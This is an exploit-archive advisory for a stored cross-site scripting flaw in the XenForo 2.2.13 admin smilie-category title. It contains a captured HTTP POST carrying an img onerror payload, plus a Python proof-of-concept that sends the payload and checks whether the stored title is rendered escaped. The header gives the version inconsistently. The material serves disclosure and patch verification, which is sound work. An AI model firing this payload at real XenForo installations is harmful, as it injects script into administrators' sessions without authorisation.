Xenforo 2.2.13 Cross Site Scripting

Xenforo version 2.2.13 suffers from a persistent cross site scripting vulnerability.

Packet Storm
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE :
-----------------------------------------------------------------------------

Requests

POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"

<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"

/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"

json
-----------------------------333176689514537912041638543422--

Response:

After it is created, an alert comes immediately.
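The following script is an added example, not part of the exploit file above and not XenForo code. It rebuilds the advisory's multipart request programmatically (same field names and order, the same `<img onerror>` payload in `title`), sends it with an admin session against a lab instance, then re-fetches the smilie listing and classifies how the stored title came back: raw tag (vulnerable), HTML-entity encoded (correct output encoding), or absent. The base URL, cookie header and `_xfToken` value are placeholders that you must take from your own admin session; the advisory's capture sends `_xfToken` twice, and the assumption here is that one copy suffices.

```python
"""Stored-XSS check for the XenForo admin smilie-category title (added example).

Placeholders: base_url, the Cookie header (xf_csrf / xf_session / xf_session_admin)
and the _xfToken value all come from your own lab admin session.
"""
import html
import sys
import urllib.request
import uuid

# Payload from the advisory's "title" field.
PAYLOAD = '<img src=x onerror=alert(document.domain)>'


def build_multipart(fields, boundary=None):
    """Encode ordered (name, value) pairs as a multipart/form-data body.

    Returns (content_type_header_value, body_bytes). Browsers emit CRLF line
    endings and a closing "--boundary--" line; the captured request above has
    the same layout, so it is reproduced exactly here.
    """
    boundary = boundary or "----xfpoc" + uuid.uuid4().hex
    chunks = []
    for name, value in fields:
        chunks.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n'
            f"\r\n{value}\r\n"
        )
    chunks.append(f"--{boundary}--\r\n")
    return f"multipart/form-data; boundary={boundary}", "".join(chunks).encode()


def smilie_category_fields(xf_token, title, request_uri="/admin.php?smilies/"):
    """Fields of the advisory's POST, in the same order; the title carries the
    payload. _xfToken is sent once (assumption: the duplicate in the capture
    is not needed)."""
    return [
        ("_xfToken", xf_token),
        ("title", title),
        ("display_order", "1"),
        ("_xfRequestUri", request_uri),
        ("_xfWithData", "1"),
        ("_xfResponseType", "json"),
    ]


def classify_response(page_html, payload=PAYLOAD):
    """Decide how a stored title was rendered on a later page.

    'vulnerable' - the raw tag is present, so a browser will execute it
    'escaped'    - only the HTML-entity form is present (correct output encoding)
    'absent'     - the value was not rendered on this page at all
    """
    if payload in page_html:
        return "vulnerable"
    if html.escape(payload, quote=False) in page_html:
        return "escaped"
    return "absent"


def run_poc(base_url, cookie_header, xf_token, title=PAYLOAD):
    """Store the payload, then re-fetch the smilie list and classify it.

    A rejected CSRF token or expired admin session surfaces as an HTTPError
    from urlopen; that is left to propagate so the failure is visible.
    """
    content_type, body = build_multipart(smilie_category_fields(xf_token, title))
    post = urllib.request.Request(
        base_url + "/admin.php?smilie-categories/0/save",
        data=body,
        headers={
            "Content-Type": content_type,
            "Cookie": cookie_header,
            "X-Requested-With": "XMLHttpRequest",
            "Referer": base_url + "/admin.php?smilies/",
        },
        method="POST",
    )
    with urllib.request.urlopen(post, timeout=10) as resp:
        resp.read()  # JSON status; the interesting part is the stored value
    get = urllib.request.Request(base_url + "/admin.php?smilies/",
                                 headers={"Cookie": cookie_header})
    with urllib.request.urlopen(get, timeout=10) as resp:
        return classify_response(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # usage: python poc.py http://127.0.0.1 "<Cookie header>" "<_xfToken value>"
    print(run_poc(*sys.argv[1:4]))
```

The same `classify_response` check is what you would run after applying a vendor fix: a patched instance should return `escaped` for the smilie listing, and any other admin page that renders the category title (the smilie editor's category dropdown, for instance) is worth checking with the same function, since a stored value can be escaped in one template and not in another.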
